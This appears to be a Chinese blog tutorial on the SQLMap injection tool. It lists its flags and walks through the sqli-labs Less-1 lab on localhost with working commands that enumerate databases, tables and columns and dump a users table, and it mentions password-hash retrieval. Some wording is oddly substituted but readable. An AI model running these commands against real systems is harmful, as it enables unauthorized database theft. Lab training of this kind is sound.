SQLMap工具使用
一、SQLMap介绍SQLMap 是一款强盛的开源主动化 SQL 注入工具,用于检测和利用 Web 应用程序中的 SQL 注入漏洞。其工作原理是SQLMap 通过向目的 URL 发送带有特殊构造的 SQL 语句的请求,观察目的应用程序的相应,来判定是否存在 SQL 注入漏洞。例如,它会实验在 URL 参数中添加单引号、解释符号等特殊字符,观察应用程序是否返回非常信息。假如发现存在漏洞,SQLMap 会根据漏洞类型和目的数据库的特点,构造符合的 SQL 注入语句,以获取所需的信息或执行命令。例如,通过联合查询注入,可以将恶意查询与原查询合并,从数据库中获取额外的数据。
SQLMap工具地点:
官方网站:sqlmap: automatic SQL injection and database takeover toolhttps://csdnimg.cn/release/blog_editor_html/release2.3.8/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=P1C7https://sqlmap.org/
GitHub项目地点:https://github.com/sqlmapproject/sqlmap
二、SQLMap使用前言
在使用SQLMap这款工具前,需提前安装好python编译工具,本次使用结合sqli-labs-master靶场举行演示
https://i-blog.csdnimg.cn/direct/6c8f6cb1c89a403e974b4b77856adc76.png
注意:在SQLMap安装目录下使用,如
https://i-blog.csdnimg.cn/direct/e92d5b830ac34834a99ade493e2141eb.pnghttps://i-blog.csdnimg.cn/direct/9f62b49b91324cb88fe22cb1d978be9c.png
赤色框住部分输入cmd,然后点击回车,进入命令行界面
https://i-blog.csdnimg.cn/direct/6903fa4b0f5f4b12acd6e14934984208.png
三、SQLMap基本参数
可输入sqlmap.py --help 或 sqlmap/py -h 举行指令查察
https://i-blog.csdnimg.cn/direct/a9aa6b204e524aa0a54ef7ad444946c1.png
-d 指定直接数据库连接得连接字符串,直接连接到数据库。
-u 指定URL目的
-I 从Burp或WebScarab代理得日志中解析目的
-m 扫描文本文件中给出得多个目的,批量扫描
-r 从文本中加载HTTP请求。 用 * 标记注入位置
-g 将Google Dork得结果作为目的URLh
-a 获取全部信息
-current-user 获取DBMS当前用户
--current-db 获取DBMS当前数据库
--hostname 获取DBMS当前主机名
--is-dba 检测当前用户是否为管理员用户
--users 查询DBMS用户
--passwords 查询DBMS用户密码hash
--dbs 查询DBMS数据库
--tables 查询DBMS数据库中得表
--columns 查询DBMS数据库表得列名
--dump 查询转储DBMS数据库表
--dump-all 转储DBMS全部数据库表
-D db_name 指定要求罗列的DBMS数据库名
-T table_name 指定要罗列得DBMS表
-C column_name 指定要罗列得DBMS列
--batch 从不询问用户输入,使用全部默认配置
常用语法:
查看所有数据库:python sqlmap.py -u “url地址/?id=1” --dbs --batch 查看某个数据库所有表名:python sqlmap.py -u "URL地址" -D 数据库名 --tables 查看某个数据库下某张表下所有字段名:python sqlmap.py -u "URL地址" -D 数据库 -T 表名 --columns 四、迈入实践,以sqli-labs-master靶场第一关为例:
1、打开sqli-labs-master中第一关Less-1
https://i-blog.csdnimg.cn/direct/b75fc9ebf37947c6a59711f3e2941951.png
2、输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbshttps://i-blog.csdnimg.cn/direct/17bcf7bdb0a34f2cbb9184fcda0b7e95.png
3、成功获取全部数据库库名
https://i-blog.csdnimg.cn/direct/73bac0b837c946b1826d3735ad522065.png
4、获取数据库security下全部的表名
python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables
https://i-blog.csdnimg.cn/direct/edc2c0ed60634b949ee08870c1b86c54.png
5、获取数据库security下users表名下全部字段名
python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --columns
https://i-blog.csdnimg.cn/direct/143ae43938b04511b2b3ca6ed7b2fe1b.png
6、获取数据库security下users表名下全部字段名的数据
python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --dump
https://i-blog.csdnimg.cn/direct/1314b17211e3486889c4a1dcb90d7b2a.png
注:--dump命令请审慎使用,切勿违法使用,使用--dump参数后,将会在计算机当地天生一个.csv表格数据存储,里面包罗某个数据库某张表下全部字段的具体内容
五、拓展使用,以sqli-labs-master靶场为例子:
查询当前数据库:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db
https://i-blog.csdnimg.cn/direct/18e39a3d97d3407cbad8d991715526ce.png
查询当前数据库用户:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user
https://i-blog.csdnimg.cn/direct/4dcad23e12d8446fa146da361e030463.png
查询当前数据库版本信息:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -banner
https://i-blog.csdnimg.cn/direct/e9b611619ce843a298ede1ce1a67c340.png
那么SQLMap这款工具简朴介绍这里,SQLMap工具十分强盛,以上只是部分用法,更多具体用法可结合官方操纵文档去使用。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]